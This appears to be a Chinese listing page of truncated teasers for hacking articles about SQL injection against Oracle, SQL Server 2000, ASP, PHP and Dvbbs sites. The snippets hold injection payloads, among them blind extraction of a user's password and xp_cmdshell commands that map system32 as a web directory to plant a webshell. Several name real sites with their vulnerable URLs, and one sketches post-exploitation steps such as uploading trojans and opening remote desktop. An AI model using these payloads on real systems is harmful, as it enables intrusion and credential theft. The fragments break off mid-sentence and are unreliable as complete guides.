正在看的ORACLE教程是:Oracle也有注入漏洞。近期，MSN、江民等知名网站相继受到了黑客的威胁和攻击，一时间网络上风声鹤唳。本报编辑部接到本文作者（炽天使）的电话，他详细讲述了发现国内最大域名提供商（以下简称“X网”）网站漏洞的经过。本报编辑部立即和X网的首席工程师进行了交流，确认了漏洞的真实性，该工程师也及时修补了该漏洞。　　发现　　10月18日，笔者手上的项目做完以后，便和网上的朋友天南海北地聊天。听到朋友网站的开张，心里也是非常的羡慕。　　什么时候我才能拥有自己的主机和域名……想到申请主机和域名，笔者自然想到了X网（在中国太有名嘛^_^）。顺手打开其主页，突然看到了主页右上角的会...

SQLServer2000注入防护大全(二)　　传统查询构造：select*FROMnewswhereid=...ANDtopic=...AND.....admin'and1=(selectcount(*)from[user]whereusername='victim'andright(left(userpass,01),1)='1')anduserpass<>'select123;--;usemaster;--:a'ornamelike'fff%';--显示有一个叫ffff的用户哈。'and1<>(selectcount(email)from[user]);--;up...

SQLServer2000注入防护大全(一)Sql注入早源于'or'1'='1最重要的表名：select*fromsysobjectssysobjectsncsysobjectssysindexestsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses　　最重要的一些用户名（默认sql数据库中存在着的）publicdboguest(一般禁止，或者没权限)db_sercurityadminab_dlladmin　　一些默认扩展xp_regaddmultistringxp_regdeletekeyxp_regd...

sql注入建立虚拟目录，免得找web绝对路径----------------------------------------------------------------我们很多情况下都遇到sql注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：execmaster.dbo.xp_cmdshell'cscriptC:\Interpub\AdminScripts\mkwebdir.vbs-clocalhost-w"l"-v"win","c:\winnt\system32"'建立虚拟目录win,指向c:\winnt\system32exec...

一、概述   漏洞介绍：http://coolersky.com/leak/programme/bbs/2006/0515/515.html   前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了，一直也没时间看看，下午跟Edward要了个链接看了看：http://www.eviloctal.com/forum/read.php?tid=22074   本站转贴为：http://coolersky.com/articles/hack/analysis/programme/2006/05...

文章中的信息适用于:  Microsoft Data Access Components versions 1.5, 2.0, 2.1, 2.5  Active Server Pages  Microsoft Visual InterDev, version 1.0  -------------------------------------------------------...

今天看到有个关于搜索型注入的文章，用到的是一种新技术，探测的是三星：http://notebook.samsung.com.cn/index.aspx注入方式是：一般网站的搜索都是部分匹配的有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=构造注入语句 三星%’and 1=1 and ’%’=’          ...

起因:　听承诺说ＣＡＳＩ出２.0了，而且承诺也给了一个有漏洞的地址，正好没事就测试了一下，最近非常郁闷，学不下去，正好今天承诺勾起了我学习php的美好时光，看看自己还能不能搞这样的站吧.过程：承诺给的地址是http://www.gametea.com//showboard.php?id=282很标准的php注入形式，我们也按照标准的php注入方法来进行注入，首先再后面加一个',http://www.gametea.com/showboard.php?id=282' 如图１他告诉我们２个方面的信息，第一是magic_quotes_gpc=off第二个就是web路径/home/newgt...

一般注入点是http://www.xxxxx.net/list/asp?id=Num这种形式的，不过随着注入技术的泛滥，有点安全意识的人都把明显的注入点过滤了，黑客站点就更不用说了。记得77169.的动画教程中好像有一个讲的就是注入潮阳网，偶记得好像是下载页面，字符型注入，注入页面是类似这样的http://www.xxxxx.net/list/asp?id=Num&ppath=undefined。为了证实我去试了一下，我测试的页面是http://www.cycycy.net/list.asp?id=2026&ppath=undefined，在下载页面后加了一个“’”。 ...

首先先声明这个文章是写给菜鸟朋友看的   .现在注入横飞！工具一大堆，过去手工注入的时代已经不复存在！代之的是NBSIHDSI啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的网站密码就出来了.接下来就是扫扫后台.传传马.就完了.就这样简单.碰到SA权限的话就.直接建立号开3389或者上传WEBSHELL.是内网就映射.是DB_OWNER权限的话呢就考虑用备份差异.但是WEB和数据库不在同一台服务器该怎么搞呢？其实也不一定是搞不定.除了往注册表启动键值写DOS命令，让目标服务器下会开机执行，不过也是有局限性的....

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错： exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目录win,指向c:\winnt\sy...